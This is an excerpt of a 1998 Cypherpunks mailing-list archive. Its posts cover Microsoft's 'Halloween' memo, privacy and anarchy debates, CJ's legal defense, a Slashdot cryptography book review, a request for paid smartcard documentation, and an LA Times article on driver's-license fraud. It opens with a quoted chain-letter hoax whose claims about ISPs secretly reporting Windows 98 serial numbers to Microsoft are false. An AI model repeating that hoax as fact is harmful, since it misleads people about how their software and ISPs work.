> >>>>COPIED / UNLICENSED Windows 98:
> >>>>
> >>>>Whenever you logon into the internet, during the verifying
> >>>>password duration. Your ISP (Internet Service Provider
> >>>>eg:SingNET,PacNET,CyberNET,SwiftNET) will download a
> >>>>SUB-REGISTRY ENCRYPTED HEXADECIMAL (containing all your
> >>>>PROGRAMS serial numbers installed into Win98!!) file from
> >>>>your Windows 98 registry. Then they send this SUB-REGISTRY to
> >>>>Microsoft for verification. And ONLY Microsoft knows how
> >>>>to decode this encypted hexadecimal file.
> >>>>
> >>>>If Microsoft verified that the serial numbers are authentic,
> >>>>then they WILL REGISTER THOSE NUMBERS FOR YOU
> >>>>A-U-T-O-M-A-T-C-A-L-L-Y !!!
> >>>>
> >>>>And if Microsoft denied those serial numbers, then they will send
> >>>>an E-Mail to the ISP you dialled into and your ISP will start
> >>>>tracing everyone who logons to their systems. That's why during
> >>>>sometime for no reason your internet started slowing down.
> >>>>And if your ISP verified that the SUB-REGISTRY ENCYPTED HEXADECIMAL
> >>>>file is yours, they will send your information over to Microsoft
> >>>>Singapore. And there they will decide whether to take actions or not.
> >>>>
> >>>>There is already 54 cases in Singapore regarding uses of PIRATE
> >>>>/ COPIED / UNLICENSED Windows 98.
> >>>>
> >>>>I do not wish to see any of my friends get into this million dollar
> >>>>tangle from Bill Gates, not that I hate this guy, but it really
> >>>>sucks when they made such anti-piracy move into the software itself
> >>>>- thus forcing everyone to buy Microsoft original's Windows 98, if
> >>>>not they'll slap you with a lawsuit.
> >>>>
> >>>>Forward this mail to as many people you know, and who knows
> >>>>you may just save one of your friends from getting sued by Microsoft.
> >>>>
> >>>>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 5 Nov 1998 04:14:14 +0800
To: cypherpunks@cyberpass.net
Subject: MS "halloween" doc, vs. linux
Message-ID: <199811041937.LAA08348@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



some people objected to my last post ranting about MS
tactics relative to the browser market. there has been
a remarkable development that shows how MS deliberately
attempts to "sabotage" markets through FUD etc.... an
internal policy memo that discusses their tactics leaked
to the public..

good article on Slate about how MS is attempting to
sabotage the growth of new free linux software through a systematic
strategy of "decommoditizing" or "embrace and extend" where
some people call this "copy and corrupt":

http://www.salonmagazine.com/21st/

if MS's strategies in the world were as simple as "make
good products so people will buy them", who could complain?
but they constantly see software development as trench
warfare and a bloody, no-hold-barred melee. I'm positive
they will be chastised after this antitrust trial finishes..
we'll see..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 5 Nov 1998 02:34:02 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Computers as instruments of liberation
In-Reply-To: <v0313031cb2630c8c97f1@[209.66.100.110]>
Message-ID: <v04011707b26636da6458@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:22 AM -0500 11/2/98, Tim May wrote:
>Fatuous nonsense. After all, those folks down the road may be taxing them,
>and may need killing. Or those folks may use computer networks to connect
>to others for the purposes of liberation.
>
>I see computer networks as promoting secessionism, freedom fighting, and
>resistance in general.
>
>The New World Order, the One Worlders, see this as "terrorism."
>
>Which is why strong encryption is needed. Which is why "they" oppose strong
>encryption.
>
>John Gage has a typically Fabian socialist view that somehow
>computerization will lead to an orderly, peaceful world.
>
>Me, I view networks as  the key to retribution and justice.

	Then again, it could be that after all the "secessionism and
freedom fighting" are done with, the resulting "disorder" (as in lack of
rulers) will be so ubiquitous that *WARS* will no longer happen, as there
is no one to lead the armies. and no one paying taxes to support those
armies.

	That then would be peasce, no?
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Nov 1998 01:57:26 +0800
To: cypherpunks@toad.com
Subject: CJ Legal Defense
Message-ID: <199811041719.MAA27882@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Larry Dowling, an Austin attorney participating in CJ's
legal defense, has engaged me to gather information
for CJ's defense. This message and any related
correspondence with me is protected as "attorney 
privileged information." 

Larry, who does not use E-mail, has asked me to
obtain the following information for forwarding to
him (Plaintext and ciphertext welcomed; PK below.
Your choice as to posting responses to cpunks.)

1. How many people who saw the CJ posting cited by 
the IRS as a death threat against federal officials took 
it as a serious threat? See the IRS complaint at:

   http://jya.com/cejfiles.htm

2. If you answer "yes" to the question 1, then in your
opinion are you of sound mind?

3. How many people are willing to help CJ's defense by
answering questions and testify concerning his postings?

4. How many cypherpunks (and others) are willing to 
attend a trial for CJ in Washington State if the government 
proceeds to trial?

For verification of this message here's Larry's contact:

Larry J. Dowling
Attorney at Law
606 West Eleventh Street
Austin, Texas 78701-2007
Tel: (512) 476-8885
Fax: (512) 476-9918

My contact:

John Young
251 West 89th Street, Suite 6E
New York, NY 1002
Tel: (212) 873-8700
Fax: (212) 799-4003

-----

There are John Young <jya@pipeline.com> PGP 2.X PKeys 
on the servers. Here's PGP5.5:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.2 for non-commercial use <http://www.pgp.com>

mQGiBDUT1GoRBAD96qrjqMjIZK30XrvsEgsDssidjh4gjxoM3XZwYvjuNqohFUYC
W6ktcjtHkITXeCP0leprRByF4LIZZp75JrR/FODnpELnTQwzQ03kD/OTRBl+m2ED
/3N4T29KwwKdvEvfoKgJ8UYrAb4nS5F7W26kiKAIslpIIKBSdMCWszoBRwCg/ydS
4PuvY6YJMbHc3Ir0OpW9NZ8EANM9K1c7OKDOQEriJOtYqlwd//qKP2GQLvq7Kdel
/fjZRKBDW3vRRJZvNkTpMN44eRz2wJxuQh1Jjqj/RWO7+KkeJF1ftVhWcC3kzmBa
7HX2CXmFX2Y+/Fqk1nyzDh2hD5nDidYS4uDMgNfAKs8WBVqWY9l9rHmX3LvoKIUP
WYGWBADFmYF5n+6LMwnrEWJb3/G/LPTz8bupjZAX3pk7JAysJjwet1ZRfN356RuF
8p4ia4BY8evpmwG0ICW0skrzPf6EelOGef7RpQN+4CSTHaF2lsMe4PFfQSI9c7lP
vGG74byiiR7V9BpWR6yhsB18FZhrCXkp44HQTFEbqbDbKwB3krQdSm9obiBZb3Vu
ZyA8anlhQHBpcGVsaW5lLmNvbT6JAEsEEBECAAsFAjUT1GoECwMCAQAKCRCDRF/O
eTbvYJ2pAJ0cPHIxXi8h0tbgWOH9NgPof7uH7QCfee3M2/PHjS59s5KTLHi1qrHu
O+m5Ag0ENRPUaxAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU
6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN
/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9
WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0
/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQ
mwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIIANDxYVQYe4ZXIS8pYMT5
RyCM1IH8Zl2D29Dem3DpaR8nIaaV7S3MqtQ78m0dH2ae5GeyVEmNl1Hbr0N2SHzi
tmAMHqU2wriYsWuczFO+55Qman924+0LHJTykpj6LIzs7C426hkj23nuDc4m4y4n
p8wCLg8f4ySWwDHdFNgydRwcgC6M8Z5HqFeCsUFX5KPbZjxmMyD+jzoeKSKtju4D
MqTMvbotVDycnjB4P2aXEas1iie4irlgB/bNsQCFQY3KdTJsCkb70KwaK+eAzo5Y
iXXREZqK9XsIR65AG5B6jenwziwrTEirCtqDs4gqBt54X/IeKIjJDIYwTmUyxIcW
GK2JAEYEGBECAAYFAjUT1GsACgkQg0Rfznk272D76gCg/LOtMsq7I0NnuEp3qr/I
qKmOJngAoNPsyKKflQrPkA6LAJfFXVRmRSdx
=KgPx
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 5 Nov 1998 03:11:17 +0800
To: "'cypherpunks@cyberpass.net>,       "'e$@vmeng.com'" <e$@vmeng.com>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone	 Alternative
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B226@yarrowbay.chaffeyhomes.com>
Message-ID: <v04011708b266396dff24@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:31 PM -0500 11/2/98, Matthew James Gering wrote:
>> paradox of financial cryptography, and, more specifically,
>> digital bearer settlement, is not that it gives you privacy
>> and freedom (anarchy? :-))
>
>Anarchy != privacy

	However, Privacy + Freedom == Anarchy, or close enough to be
indistinguishable.

>In fact to many people privacy is a very statist construct, as they clamor
>for more privacy regulations by government.

	No, to many people, the Government is a magical device that can
repeal the laws of physics, and change peoples hearts. They don't think
that government can *create* privacy, they think it is willing or able to
*enforce* it.

	Then again, there is little enough evidence of thougt amoung "many
people".
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 5 Nov 1998 03:50:37 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: 0851244.shtml
Message-ID: <199811041847.MAA08231@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



   Advertisement Welcome to Slashdot Science News Technology Star Wars
   Prequels The Internet  faq
    code
    awards
    slashNET
    older stuff
    rob's page
    submit story
    book reviews
    user account
    ask slashdot
    advertising
    supporters
    past polls
    features
    about
    jobs
    BSI 
   
   
   Review:Handbook of Applied Cryptography Encryption Posted by Hemos on
   Wednesday November 04, @08:51AM
   from the just-the-facts-ma'am dept.
   Giving some actual theory to the whole cryptography discussion, Ian S.
   Nelson's review of Handbook of Applied Cryptography takes a look at
   this veritable tome of information. This isn't a book for those of you
   trying to figure out exactly what the NSA actually does; this is for
   the real meat and numbers behind it all. Click below for more info.
   
   REVIEW: Handbook of Applied Cryptography Alfred J. Menezes, Paul C.
   van Oorschot, Scott A. Vanstone CRC Press (ISBN 0-8493-8523-7)
   Nutshell
   Review: Required reading for any cryptography freak.
   Rating: 9/10
   
  The Scenario
  
   CRC Press has been building a series of books on discrete mathematics
   and its applications. Doug Stinson wrote the theory book on
   cryptography (Cryptography: Theory and Practice (ISBN: 0-8493-8521-0,
   if you don't like this book you'll vomit when you see the Stinson
   book) and this is the application book on cryptography. It's close to
   800 pages chocked full of information.
   
   I must confess that I'm a cryptography freak and I'm a little sick of
   the constant political discussions and lack of tech talk, this book is
   all tech and might even be a little much if you're not into math. It's
   a wonderful companion to the Schneier books (Applied Cryptography 1st
   or 2nd Edition A.K.A. "the crypto bible") if you're into the nitty
   gritty details of cryptography.
   
  What's Bad?
  
   I really like this book and I can't find a lot that I don't like about
   it... but I think in places the math gets a little thick. I have a
   degree in math and I find myself returning to the math overview
   section more often than I'd like to admit. If you're not familiar with
   discrete math and combinatorics then this book probably isn't for you.
   If you enjoy that stuff, then this will be a piece of cake. If you're
   looking to build your crypto book library up I'd highly recommend this
   book before you get some of the more hard-core books.
   
   Something else I feel is lacking is cryptanalysis on ciphers. They
   discuss attacks on various protocols and hashes but actual attacks on
   ciphers are glossed over. As a companion to Cryptography: Theory and
   Practice, which covers cryptanalysis in more detail, it is
   understandable to leave that material out of this book but I think
   they could discuss it a little more than they do without going into
   specifics.
   
   The no-nonsense style can be a little dry at times, there aren't a lot
   of jokes or anecdotes to lighten things up in this book.
   
  What's Good?
  
   Cipher isn't spelled with a 'y' anywhere in this book. It's not filled
   with a lot of opinion or rumor. It doesn't hardly bring up ITAR, key
   escrow, or the NSA's mystical superpowers. This book is about
   cryptographic techniques and a listing of patents is about as
   political or opinionated as it gets.
   
   It is kind of like a textbook without the problems at the end of each
   chapter. It is written in an outline format with subitems of
   "Definition", "Fact", "Notes", "Example", and "Algorithm." Each
   subitem is followed by a few short but concise paragraphs of
   explanation.
   
   Plenty of charts and figures fill the pages and everything is
   explained well. While it lacks source code, there is certainly enough
   information for you to implement any of the ciphers, hashes, or
   protocols covered. It even includes some test vectors for a lot of the
   algorithms.
   
  So What's In It For Me?
  
   If you want to learn about cryptography, not the politics but the
   actual technology, then this is a great book to get before you get
   over your head. It's very readable and while the math can be a little
   heavy in places it is accessible and useful. It gives you a good
   flavor of how more advanced papers and books on the subject are and it
   avoids the nonacademic discussions surrounding cryptography.
   
   To pick this book up, head over to Amazon and help Slashdot out.
   
    Table of Contents
    1. Overview of Cryptography
         1. Introduction
         2. Information Security and Cryptography
         3. Background on Functions
         4. Basic Terminology and Concepts
         5. Symmetric-key Encryption
         6. Digital Signatures
         7. Authentication and Identification
         8. Public-key Cryptography
         9. Hash Functions
        10. Protocols and mechanisms
        11. Key establishment, management, and certification
        12. Pseudorandom numbers and sequences
        13. Classes of attacks and security models
        14. Notes and further references
    2. Mathematical Background
         1. Probability theory
         2. Information theory
         3. Complexity theory
         4. Number theory
         5. Abstract algebra
         6. Finite fields
         7. Notes and further references
    3. Number-Theoretic Reference Problems
         1. Introduction and overview
         2. The integer factorization problem
         3. The RSA problem
         4. The quadratic residuosity problem
         5. Computing Square roots in Zn
         6. The Discrete logarithm problem
         7. The Diffie-Hellman problem
         8. Composite moduli
         9. Computing individual bits
        10. The subset sum problem
        11. Factoring polynomials over finite fields
        12. Notes and further references
    4. Public-Key Parameters
         1. Introduction
         2. Probabilistic primality tests
         3. (True)Primality tests
         4. Prime number generation
         5. Irreducible polynomials over Zp
         6. Generators and elements of high order
         7. Notes and further references
    5. Pseudorandom Bits and Sequences
         1. Introduction
         2. Random bit generation
         3. Pseudorandom bit generation
         4. Statistical tests
         5. Cryptographically secure pseudorandom bit generation
         6. Notes and further references
    6. Stream Ciphers
         1. Introduction
         2. Feedback shift registers
         3. Stream ciphers based on LFSRs
         4. Other stream ciphers
         5. Notes and further references
    7. Block Ciphers
         1. Introduction
         2. Background and general concepts
         3. Classical ciphers and historical development
         4. DES
         5. FEAL
         6. IDEA
         7. SAFER, RC5, and other block ciphers
         8. Notes and further references
    8. Public-Key Encryption
         1. Introduction
         2. RSA public-key encryption
         3. Rabin public-key encryption
         4. ElGamal public-key encryption
         5. McElliece public-key encryption
         6. Knapsack public-key encryption
         7. Probabilistic public-key encryption
         8. Notes and further references
    9. Hash Functions and Data Integrity
         1. Introduction
         2. Classification and framework
         3. Basic constructions and general results
         4. Unkeyed hash functions (MDCs)
         5. Keyed hash functions (MACs)
         6. Data integrity and message authentication
         7. Advanced attacks on hash functions
         8. Notes and further references
   10. Identification and Entity Authentication
         1. Introduction
         2. Passwords (weak authentication)
         3. Challenge-response identification (strong authentication)
         4. Customized zero-knowledge identification protocols
         5. Attacks on identification protocols
         6. Notes and further references
   11. Digital Signatures
         1. Introduction
         2. A framework for digital signature mechanisms
         3. RSA and related signature schemes
         4. Fiat-Shamir signature schemes
         5. The DSA and related signature schemes
         6. One-time digital signatures
         7. Other signatures schemes
         8. Signatures with additional functionality
         9. Notes and further references
   12. Key Establishment Protocols
         1. Introduction
         2. Classification and framework
         3. Key transport based on symmetric encryption
         4. Key agreement based on symmetric techniques
         5. Key transport based on public-key encryption
         6. Key agreement based on asymmetric techniques
         7. Secret Sharing
         8. Conference Keying
         9. Analysis of key establishment protocols
        10. Notes and further references
   13. Key Management Techniques
         1. Introduction
         2. Background and basic concepts
         3. Techniques for distributing confidential keys
         4. Techniques for distributing public keys
         5. Techniques for controlling key usage
         6. Key management involving multiple domains
         7. Key life cycle issues
         8. Advanced trusted third party services
         9. Notes and further references
   14. Efficient Implementation
         1. Introduction
         2. Multiple-precision integer arithmetic
         3. Multiple-precision modular arithmetic
         4. Greatest common divisor algorithms
         5. Chinese remainder theorem for integers
         6. Exponentiation
         7. Exponent recoding
         8. Notes and further references
   15. Patents and Standards
         1. Introduction
         2. Patents on cryptographic techniques
         3. Cryptographic standards
         4. Notes and further references
   16. Appendix A: Bibligraphy of Papers from Selected Cryptographic
       Forums
         1. Asiacrypt/Auscrypt Proceedings
         2. Crypto Proceedings
         3. Eurocrypt Proceedings
         4. Fast Software Encryption Proceedings
         5. Journal of Cryptology papers
            
   <  The demise of Crack.com | Reply | Flattened | 50 Gb drives from
   Seagate  >
   
     Related Links
   
   Slashdot
   
   Cryptography: Theory and Practice
   
   book
   
   Amazon
   
   Ian S. Nelson's
   
   NSA
   
   More on Encryption 
   
   Also by Hemos [INLINE]
   
   Amazon Info The books here are brought to us in Partnership with
   Amazon.com.
   
   If you follow the links around here, and eventually buy a book, we get
   a percentage of the cost!
   
   Want books about any of these things? Perl, Linux, Unix, Gardening,
   CGI, Java?
   
   Still not finding what you're looking for? Visit Amazon.com from this
   link, and we still get some credit. Or you could even Search Amazon
   using this convenient form:
   ____________________ ______
   [INLINE]
   
   The Fine Print: The following comments are owned by whoever posted
   them. Slashdot is not responsible for what they say.
   
   
   < Down One | This Page's Threshold: 0 | Up One >
   (Warning:this stuff is extremely beta right now)
   Amazon.com confuses "Applied Cryptography" with "H
   by Anonymous Coward on Wednesday November 04, @09:09AM
   For those of you who order the Handbook of Applied Cryptography, don't
   be suprised if amazon sends you Bruce Schneiers "Applied Cryptography"
   instead.....its happened to me and another person I know..
   
   
   [ Reply to this ] politics / history is relevant (Score:1)
   by harshaw on Wednesday November 04, @10:00AM
   (User Info)
   
   On of the great things about Schneier's Applied Cryptography was how
   he intertwined the mathematics with the political ramifications of the
   particular crypto algorithm. I think the study of Crypto needs to be
   tightly coupled with an understanding of the societal / political
   issues around it. For instance, you can't simply implement 128 bit RC5
   in your product and ship it of to Iraq without having RSA (for patent
   violations) and the NSA (for the obvious reasons) come down on your
   head.
   
   
   IMO, Crypto is a VERY tough subject and requires an intense amount of
   study to understand the math. If the text you are studying is dry and
   lacking wit or humor, it makes the job even harder :(
   [ Reply to this ]
     * politics / history is relevant by Anonymous Coward on Wednesday
       November 04, @11:57AM
       
   
   
   Loved it! I laughed! I cried! (Score:1)
   by bobse on Wednesday November 04, @11:14AM
   (User Info) What I liked was the way that each algorithm was reviewed
   in a very consistent manner. Most algorithms were described not just
   with words and mathematics (which is good), but also with pseudocode
   (which is great if you are actually trying to implement this stuff).
   The consistent, itemized format also allows you to compare the
   strengths/weaknesses of different algorithms yourself, instead of
   relying on someone else to do it for you. Very cool.
   
   9.5/10
   
   
   [ Reply to this ] Price Check (Score:1)
   by Ralph Bearpark on Wednesday November 04, @12:15PM
   (User Info) As an onging service to /. readers ...
   
   Amazon = $84.95
   BarnesAndNoble = $109.50 (HAHAHAHA!)
   Shopping books = $71.96
   Spree books = $67.99
   
   (Is it my imagination, or is /. reviewing increasingly expensive,
   non-Amazon-discounted books? Surely not. :-))
   
   Regards, Ralph.
   [ Reply to this ]
     * Price Check by Anonymous Coward on Wednesday November 04, @01:12PM
       
   
   
   The Fine Print: The following comments are owned by whoever posted
   them. Slashdot is not responsible for what they say.
   
   
   < Down One | This Page's Threshold: 0 | Up One >
   (Warning:this stuff is extremely beta right now)
     ____________________ ______
   
     All newspaper editorial writers ever do is come down from the hills
   after the battle is over and shoot the wounded. All trademarks and
   copyrights on this page are owned by their respective companies.
   Comments are owned by the Poster. The Rest &copy 1998 Rob Malda. [
   home | awards | supporters | rob's homepage | contribute story |
   older articles | advertising | past polls | about | faq | BSI ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Cooper <scoop@insight.cas.mcmaster.ca>
Date: Thu, 5 Nov 1998 03:12:27 +0800
To: cypherpunks@toad.com
Subject: hoping to obtains copies of documentation ...
Message-ID: <199811041814.NAA27597@insight.cas.mcmaster.ca>
MIME-Version: 1.0
Content-Type: text/plain




There are two informative documents available from GEMPLUS (France)
as part of their development kit for their GPK4000 smartcard.

   1. GPK4000 Application Notes (for public key applications)
	Banking, Personal Identification, Internet Transactions 
   2. Electronic Purse Architecture for MPCOS-EMV
	(for DES and 3-DES applications)

Unfortunately, it the kit costs more than US$4k.

Any chance some kind soul could forward a copy of these documents?
If so, email me directly to make arrangements.

-- scoop




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 5 Nov 1998 06:17:41 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] L.A. DMV Tries to Stem the Tide of Fake Licenses
Message-ID: <199811042123.NAA18961@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] L.A. DMV Tries to Stem the Tide of Fake Licenses
Date: Mon, 2 Nov 1998 22:30:13 -0600
To: ignition-point@majordomo.pobox.com


SCAN THIS NEWS

[This is a little dated, but well worth reading]

--------------------------------------------

Sunday, April 5, 1998

DMV Tries to Stem the Tide of Fake Licenses

Crime: Demand for IDs fuels counterfeiting rings and corruption inside the
agency. Officials respond with anti-tampering features, more monitoring of
workers.

By VIRGINIA ELLIS, Times Staff Writer

SACRAMENTO - The California driver's license's preeminence as a form of
identification has spawned a thriving black market for fraudulent licenses
and a major corruption scandal in the state's motor vehicle department,
records and interviews show.

In recent years, as the lowly driver's license has been redesigned to make
it more tamper-resistant, the card has increasingly become the dominant
piece of identification for cashing checks, obtaining credit and securing
government services.

This, in turn, has caused the black market value for licenses to soar,
providing a catalyst for counterfeiting and bribery of Department of Motor
Vehicles employees. Scores of DMV workers in offices from San Diego to
Sacramento already have been caught illegally issuing driver's licenses, and
officials say many more are under investigation.

"We have, in effect, created a cottage industry," said Steve Solem, a DMV
deputy director. "A lot of different changes have been evolving over the
years that have made...people feel the need to get a driver's license at any
cost."

As a result, officials report that:

* Counterfeiting rings operate in every large city in the state, serving up
fake licenses of varying quality for sale on the streets. In Los Angeles,
business is so competitive that state investigators say a prospective
customer can bargain for the best price. A counterfeit identification
package, including a license, usually sells for $100, but state agents have
paid as little as $35.

* At many of the DMV's busiest offices, scam artists make use of loopholes
in procedures to get legitimate licenses, which are then peddled to
undocumented immigrants or suspended drivers. In Santa Clara County, a
four-month surveillance of DMV offices recently led to 26 felony and 16
misdemeanor arrests for using false documents to obtain driver's licenses.

* In the past two years, 144 DMV employees were fired or otherwise
disciplined for illegal activity, primarily driver's license fraud. Most
cases were referred for prosecution. The corruption affected more than a
third of the DMV offices.

"It's by far the biggest scandal and case of severe corruption in my 16
years here," said state Sen. Steve Peace (D-El Cajon), who heads a
legislative task force on personal privacy. "It's not a single organized
entity. It's a number of entrepreneurial criminal activities."

Late this year, officials plan to begin issuing new licenses with even more
sophisticated anti-tampering features to help stem the tide of
license-related crime. Among the features will be a tiny ghost image
designed to make it harder to substitute one person's photo for another.

"You've got to be as technologically alert as the criminals out there," said
DMV Director Sally Reed. "You've got to keep changing the license. You've
got to keep changing your practices."

Complicating the task is an overwhelming DMV workload. The department
licenses more than 20 million California drivers, issues more than 6 million
new licenses and identification cards a year, and operates 172 licensing
centers around the state.

How many fake and fraudulent licenses may be in circulation is impossible to
calculate. But state officials say the problem is rampant, its impact on
society insidious.

A fraudulent driver's license that is used to steal someone's identity can
cause years of frustration as the victim suddenly finds his or her credit
destroyed. Or the fake license can put a convicted drunk driver back on the
highway, where the next accident may cause someone's death.

The role of the driver's license in criminal activity was heightened not
only by the technological changes that made it so widely accepted, but by
governmental decisions to use it as a tool for punishment.

New laws have made a larger and larger pool of people susceptible to losing
their license for activities unrelated to driving. The license can be
suspended for spraying graffiti, failure to pay child support, truancy and
certain kinds of prostitution. And immigrants who lack proper proof of
residency cannot be issued one.

"If you're a drunk driver, you want a fake ID," said Alison Koch, a senior
special investigator for the DMV in Sacramento. "If you're in a gang, you
want a fake ID. If you're a deadbeat dad, you want a fake ID. If you're an
illegal alien, you want a fake ID. If you want to commit check or credit
card fraud, you want a fake ID.

"There is hardly a crime out there that doesn't demand some kind of
fraudulent identification."

For many minor crimes, she said, a bogus license - even a poor one - is all
the fraud artist needs. The quick glance that many business people give the
license before cashing a check or accepting a credit card is not enough to
discern that it's fake.

For more sophisticated crimes, said Vito Scattaglia, an area commander for
DMV investigators in Los Angeles, criminals want the real thing - and this
demand for legitimate licenses has put heavy pressure on low-level state
employees to commit fraud.

"When you have a technician who is making $2,000 to $2,400 a month and you
have an individual who is willing to pay $1,000 to process one driver's
license, you don't have to be a genius to figure out how tempting that is,"
he said.

But Peace, the state senator, said high-level officials did not recognize
how extensively their department had been infiltrated by criminals until an
embarrassing KCBS-TV Channel 2 report last year caught a DMV employee on
camera processing illegal licenses.

Until the Los Angeles broadcast, only a handful of DMV investigators had
been monitoring employee fraud, and they were struggling with a huge
backlog.

Then Reed temporarily assigned 213 DMV investigators to employee fraud and
announced that it would be the agency's No. 1 priority.

The results were staggering. Using everything from surveillance to
informants, investigators caught dozens of DMV employees around the state
processing illegal licenses. Many were teamed up with grifters on the
outside, who usually worked the DMV parking lots, preying mostly on
immigrants who would be guaranteed a license for about $1,000 to $2,000.

Typical was the case of an 18-year Torrance employee who was targeted after
a DMV computer in Sacramento showed irregularities in licenses he had
issued. After investigators interviewed dozens of his customers, the
employee was charged with computer fraud and altering public records.

"The first person I interviewed, I knew I was on the right trail," recalled
Ken Erickson, a senior DMV special investigator. "The customer was honest.
He said, 'Yeah, I'm here illegally and I can't read or write either English
or Spanish.'"

But, Erickson said, data the Torrance employee had entered into the DMV
computer stated that the man was a legal resident of California who had
passed the written driver's test in English.

Investigators searched the employee's car and found $14,280 in cash stashed
behind the front seat, Erickson said. They estimated that over a 15-month
period he had improperly issued at least 70 licenses. After pleading no
contest to two felony counts, he was fined $14,280 and placed on three years
probation. He also was fired and barred from future government employment.

The employee fraud, Peace said, is "not some sort of single grand conspiracy
with a godfather sitting on top pulling levers."

"What it has been is a culture within the department that has allowed for a
whole variety of entrepreneurial criminal behavior. It was a culture which
says, 'I've got my little deal and you've got yours. Don't mess with mine
and I won't mess with yours.'"

Although the problem predated Reed's appointment as director, Peace faulted
her for initially disbelieving it and being "slow to react" until the
television report.

Reed acknowledged the bad publicity was a wake-up call but disputed Peace's
contention the DMV has a culture of corruption, saying the vast majority of
the DMV's 8,600 workers are law-abiding.

A spokesman for the California State Employees Assn., which represents DMV
employees, accused the department of overreacting. He said the crackdown has
destroyed worker morale and become so broad that "it could very likely be
called a witch hunt."

Investigators concede that corruption within the DMV probably pales compared
to that on the outside.

Richard Steffen, chief consultant for a legislative task force investigating
state government, said crime rings are able to get legitimate licenses
simply by knowing how to work the system.

He said they know, for example, that photos and thumbprints are not taken
until the end of the licensing procedure, a process tailor-made for the use
of ringers. The ringer takes the driver's test, then the customer comes in
the next day and completes the process. "There is a pattern here that is
known on the street," said Steffen, who is preparing to release a report on
the DMV. "It's not like masterminds come up with this."

Birth certificates, which the DMV requires, are easily counterfeited, and
phony ones are hard to spot, officials said. The appearance of birth
certificates varies from state to state and sometimes, as in California,
from county to county. Adding to the problem is California's open birth
certificate procedure, which allows virtually anyone to get a certified copy
of anyone else's birth record.

One team of ringers arrested by the California Highway Patrol was found with
counterfeit birth certificates from Oklahoma, Utah, New York and Texas,
according to Bruce Wong, a senior DMV investigator in San Jose.

"They were driving up the state from Southern California, stopping at
different DMV offices and submitting license applications under different
names," he said. "In one day of driving, they had accumulated eight
different instructional permits, which they could then sell along with the
counterfeit birth certificate."

Solem said some loopholes in licensing procedures will be closed when the
department begins issuing the new licenses and taking photos and thumbprints
at the beginning of the process.

"But this is a problem that's going to be with us," he added. "Government
does something and the crooks figure a way around it and then government
catches up. It goes on and on."

Scattaglia said much of the counterfeiting may have its roots south of the
border, but no one knows for sure because investigators have only been able
to arrest the sellers, not the suppliers.

"We have gone into places and recovered sheets and sheets of holograms and
state seals - literally a setup [for] putting a license together," he said.
"But we've never found the commercial facility that has the printing presses
and all the orders. The informants we have all indicated that that place is
somewhere in Mexico."

Beth Givens, director of the San Diego-based Privacy Rights Clearinghouse, a
consumer information and advocacy program, predicted that driver's license
fraud will always be difficult to control because it's not a violent crime
and punishment is light.

"If these criminals happened to break and enter or use a gun, it would be
one thing," she said. "But because they're using paper and documents,
they're not seen as a threat to society."

Banking officials are starting to rethink their heavy reliance on the
driver's license. "That's certainly a trend that's underway because they are
increasingly fake," said Gregory Wilhelm, lobbyist for the California
Bankers Assn.

Los Angeles Times

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================





****************************************************
To subscribe or unsubscribe, email:
